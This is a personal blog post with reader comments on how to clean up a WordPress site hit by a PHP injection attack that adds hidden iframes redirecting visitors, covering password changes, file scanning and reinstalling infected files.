Jan Karlsbjerg

A Great Dane in Vancouver

So your WordPress was hacked… Now what?

Local blogger friend Dr. Beth Snow‘s site was hit with a PHP injection attack. My blog was hacked using that mechanism last summer, but today I realized that I never wrote down the recipe for cleaning it out. So here goes.

Form of the attack

The attack is in the form of some extra PHP code that gets added onto existing files on the webserver as well as written into new files on the webserver that are likely to get called. The goal is to redirect visitors’ browsers to a thirdparty website where there’s bad stuff waiting to be downloaded.

Vector

Most likely the site got hacked by a bot that did a brute-force password guessing attack on the FTP account. Once the bot gets in, it will add the code to many files.

How to get rid of it

Step 1: Upgrade your FTP password!

Prevent future attacks by upgrading your FTP password. “Sammy32” is NOT a strong password. “rU#9&Jup” is a strong (though quite short) password. If you need inspiration, there are many free strong password generators online.

Step 2: Upgrade the rest of your passwords on that webhost!

Somebody got access to some of your data, and you must assume that they’ve taken full advantage of their access, so change your other passwords too. Including:

  • Database passwords (for a WordPress blog that’s the MySQL password)
  • WordPress user accounts passwords
  • Any password protected directories (whether you set them up manually in the .htaccess file or you used your webhost’s control panel tools to do the same)

Step 3: Check all browsable files on your website

The PHP insertion hack will attack browsable files such as .php, .htm, .html. Look for lines of code with width 1, height 1 hidden iframe (see the post describing the hack on my website).

Donncha O Caoimh, a respected WordPress community contributor had created a very handy WordPress exploit scanner plugin that will look through your WordPress installation and database. If you have more content on your website than just the WordPress files (e.g. a Wiki, a static website, a downloads directory, etc.) then the WordPress plugin won’t scan those directories. For that situation I recommend using an editor or another tool that can search all files in a directory tree for a particular string.

Step 4: What to do if you find the hack code

If the hack code is the only content in the file, delete the file.

If you find the hack in any part of the site that you didn’t create yourself (WordPress core files, theme files, extensions, etc.) delete the particular directory and re-upload a freshly downloaded replacement. For plugins, the settings are stored in the DB and will survive this procedure; for theme directories, you might want to first backup .css files, image files and any other files you’ve modified.

If the hack code is inserted after the ending HTML tag, just delete the hack code and save the file.

10 Comments

  1. I think it’s also important to note that you should always have your WordPress installation fully up to date. So many people that run in to issues do so because they are using an aged version of WP, which is no good.

  2. This happened to me a couple of hours ago on a site I’m working on. All the index.php files were edited with iframe code. I’m pretty sure mine was the FTP problem as well, and if you read through http://wordpress.org/support/topic/232657 someone mentions it’s probably not directly related to WP (can happen to any site).

  3. Thanks for explaining how to fix all this! I’m only semi-tech savvy, so I was completely confused as to why my blog was behaving so strangely!

    It still freaks me out that some hacked into my blog, even if it was bot.

  4. I just started with a WordPress 2.7 blog, how can I check if it was hacked already, or will that be obvious?

  5. Roger, it probably won’t be obvious. I recommend that you install Donncha’s WordPress plugin that I link to in the post.

  6. I have always found it a bit confusing why someone would desire to hack someone else’s blog?

    Thanks for this post, Jan! We missed you at Meetup of Meetups!

  7. Raul, I had an important family commitment that evening at Denny’s (not kidding).

  8. Thanks for this. The hack (or initial point of entry, or so it looked) was of my xmlrpc.php file. It had everything but ‘From Russia with Love’ strewn on it. I downloaded a virgin copy from WordPress and blew the code away, but by that time, it had inserted something else that I couldn’t find. No matter what I did, the SPAM kept appearing. After about 6 hours of troubleshooting, doing DIFF between normal files and what I had, I finally admitted that I was beaten (this was at about 3:30 in the morning). I think that Donncha’s plugin may come in handy in the future, so I won’t have to do all of that scanning manually, but I have to admit that I’m pretty frightened of just how sophisticated this attack seemed to be. The SPAM wasn’t even in my template files or WordPress code. Instead, at the moment WordPress published a blog post, extra, hidden code would grab the SPAM from who-knows-where, and insert it between the head and body of a post, placing it in a div offscreen, and then inserting it at random in my RSS feed. Nasty.

  9. Thanks for the advice! With the WordPress exploit scanner plugin I was able to find the problem and solve it asap. Turned out it was a php script saved onto my index.php file from the public_html directory. I became aware of it when Google webmaster suggested “tattoo”-related keywords based on my site content, so I opened up my source code and found all sorts of nasty links. What?!

Leave a Reply

Your email address will not be published.

© 2021 Jan Karlsbjerg

Theme by Anders NorenUp ↑